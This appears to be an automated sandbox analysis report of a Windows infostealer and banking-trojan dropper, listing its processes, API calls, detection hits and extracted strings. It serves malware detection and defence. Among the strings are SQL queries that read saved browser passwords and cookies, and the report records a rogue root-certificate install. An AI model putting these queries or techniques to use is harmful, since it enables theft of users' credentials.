Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

E-Banking Fraud:

Registers a new ROOT certificate
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Code function: 15_2_6FEA4C20 _DebugHeapAllocator,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,std::ios_base::good,ExpandEnvironmentStringsW,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,Concurrency::details::ContextBase::GetWorkQueueIdentity,GetCurrentThreadId,GetThreadDesktop,CreateDesktopW,GetLastError,SetThreadDesktop,GetLastError,CloseDesktop,CreateProcessW,GetLastError,CloseDesktop,CloseHandle,CreateJobObjectW,AssignProcessToJobObject,_DebugHeapAllocator,Sleep,Sleep,_DebugHeapAllocator,SetThreadDesktop,CloseDesktop,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,

System Summary:

PE file has a writeable .text section
Source: aliens.exe.17.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 85F91A36E275562F.exe.19.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | Code function: 17_2_00057165: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Code function: 15_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 724
Source: KeJ7Cl7flZ.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 002.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Setup.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.26.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: KeJ7Cl7flZ.exe, 00000000.00000002.529860424.00000000074F0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs KeJ7Cl7flZ.exe
Source: KeJ7Cl7flZ.exe, 00000000.00000002.530016603.00000000075F0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs KeJ7Cl7flZ.exe
Source: KeJ7Cl7flZ.exe, 00000000.00000002.530016603.00000000075F0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs KeJ7Cl7flZ.exe
Source: KeJ7Cl7flZ.exe, 00000000.00000002.511285265.00000000052F0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs KeJ7Cl7flZ.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeSection loaded: dxgidebug.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: dxgidebug.dll
Source: 00000013.00000002.511085870.0000000003310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 19.2.aliens.exe.3310000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 19.2.aliens.exe.10000000.6.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 19.2.aliens.exe.3310000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: jg2_2qua.exe.0.drStatic PE information: Section: .MPRESS1 ZLIB complexity 1.00011398709
Source: jg2_2qua.exe.26.drStatic PE information: Section: .MPRESS1 ZLIB complexity 1.00011398709
Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@13/35@12/2
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Code function: 0_2_00EC1892 GetLastError,FormatMessageW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Code function: 15_2_6FEA1870 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Code function: 15_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | Code function: 1_2_01270B52 CoInitialize,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LdrInitializeThunk,CoCreateInstance,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Code function: 0_2_00ECF19A FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | File created: C:\Program Files (x86)\ujvqkl7ofji6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\USERDA~1\Default\Login Data.bak
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe | Mutant created: \Sessions\1\BaseNamedObjects\37238328-1324242-5456786-8fdff0-67547552436675
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3568
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Command line argument: sfxname
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Command line argument: sfxstime
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Command line argument: STARTDLG
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Command line argument: 9,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Command line argument: 9,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Command line argument: h
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | Command line argument: q
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | Command line argument: sfxname
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | Command line argument: sfxstime
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | Command line argument: STARTDLG
Source: KeJ7Cl7flZ.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp | Binary or memory string: SELECT signon_realm, username_value, hex(password_value) FROM logins;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp | Binary or memory string: SELECT * FROM moz_cookies;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp | Binary or memory string: SELECT host_key,name, value, hex(encrypted_value) FROM cookies;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: KeJ7Cl7flZ.exe | Virustotal: Detection: 67%
Source: KeJ7Cl7flZ.exe | ReversingLabs: Detection: 79%
Source: hjjgaa.exe | String found in binary or memory: 3http://crl.usertrust.com/AddTrustExternalCARoot.crl05
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | File read: C:\Users\user\Desktop\KeJ7Cl7flZ.exe
Source: unknown | Process created: C:\Users\user\Desktop\KeJ7Cl7flZ.exe 'C:\Users\user\Desktop\KeJ7Cl7flZ.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 724
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 740
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -s
Source: unknown | Process created: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe 'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe'
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe'
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe'
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe'
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Process created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -s
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | Process created: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe 'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe'
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | File written: C:\Users\user\AppData\Local\Temp\RarSFX0\config.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: KeJ7Cl7flZ.exe | Static file information: File size 7922731 > 1048576
Source: KeJ7Cl7flZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KeJ7Cl7flZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KeJ7Cl7flZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KeJ7Cl7flZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KeJ7Cl7flZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KeJ7Cl7flZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: KeJ7Cl7flZ.exe | Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: KeJ7Cl7flZ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wininet.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdbQ source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb@ source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibClr\obj\Release\SibClr.pdb source: Setup.exe, 0000000F.00000003.467283122.0000000000846000.00000004.00000001.sdmp, SibClr.dll.15.dr
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.263071378.000000000474B000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb/ source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb8 source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: propsys.pdb$ source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbF source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: D:\workspace\workspace_c\GiehH4yhJgg54_17\Release\GiehH4yhJgg54_17.pdb source: hjjgaa.exe
Source: Binary string: oleacc.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oleacc.pdbE source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: ntmarta.pdbL source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb[ source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdbI source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb< source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdbJ source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oledlg.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: setup.exe, 00000011.00000000.294134315.0000000000082000.00000002.00020000.sdmp, setup.exe.15.dr
Source: Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oledlg.pdbO source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: 3.pdb] source: hjjgaa.exe
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: KeJ7Cl7flZ.exe
Source: Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: D:\workspace\workspace_c\GiehH4yhJgg54_17\Release\GiehH4yhJgg54_17.pdb- source: hjjgaa.exe
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oleacc.pdb2 source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
